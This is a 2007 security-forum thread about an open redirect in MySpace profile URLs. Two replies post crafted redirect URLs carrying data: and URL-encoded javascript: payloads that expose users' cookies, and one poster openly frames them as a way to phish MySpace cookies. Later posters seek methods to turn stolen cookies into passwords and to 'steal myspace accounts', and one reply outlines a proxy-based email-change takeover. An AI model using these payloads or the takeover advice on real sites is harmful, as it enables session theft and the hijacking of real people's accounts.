Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace Redirect
Posted by: kane_666
Date: January 27, 2007 07:02AM

http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=http://www.google.com

Options: ReplyQuote
Re: Myspace Redirect
Posted by: WhiteAcid
Date: January 27, 2007 07:47AM

We have a thread for redirect flaws.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 01/27/2007 07:49AM by WhiteAcid.

Options: ReplyQuote
Re: Myspace Redirect
Posted by: alf
Date: January 27, 2007 08:32AM

now make someone klick on "here" and phish myspace cookies...


http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=data:text/html,%3Cbody%20onLoad=document.write(document.cookie)%3E%3C/body%3E

Options: ReplyQuote
Re: Myspace Redirect
Date: February 20, 2007 11:08AM

I'm not sure if this is a noob question or not but I was wondering once I obtained cookie data from a myspace user how would I go about extracting password information?

Options: ReplyQuote
Re: Myspace Redirect
Date: February 20, 2007 02:11PM

It'd be easier to simply use a proxy program to falsify data in the headers, login, change the email account, and simply request the password than it would to sit there and bother reverse engineering their password algorithm.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Myspace Redirect
Posted by: digi7al64
Date: February 20, 2007 07:46PM

updated alf's version to make it more portable

http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=acca0978-f1be-4af3-902d-11afaccc71e8&_u=%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Myspace Redirect
Date: February 20, 2007 08:55PM

[[[[It'd be easier to simply use a proxy program to falsify data in the headers, login,
change the email account, and simply request the password than it would to sit there and bother reverse engineering their password algorithm.]]]]


How exactly would I go about doing that? I know what proxies are and I know what they do but I don't know what you mean when you say a "proxy program" to falsify information. Any help would be greatly appreciated.



Edited 2 time(s). Last edit at 02/20/2007 10:33PM by moregorelesscore.

Options: ReplyQuote
Re: Myspace Redirect
Posted by: Spikeman
Date: February 21, 2007 06:42AM

Not to mention MySpace needs a password to change email.. (yeah I've looked into it ;)

Edit: And also a CAPTCHA if I'm not mistaken..



Edited 1 time(s). Last edit at 02/21/2007 06:42AM by Spikeman.

Options: ReplyQuote
Re: Myspace Redirect
Date: February 21, 2007 09:47AM

This seems like a hopeless situation. I'm just looking for a reliable method to steal myspace accounts. I'll try anything. I used to use that myspace flash redirect but I don't think that works anymore. Anybody have any suggestions?

Options: ReplyQuote


Sorry, only registered users may post in this forum.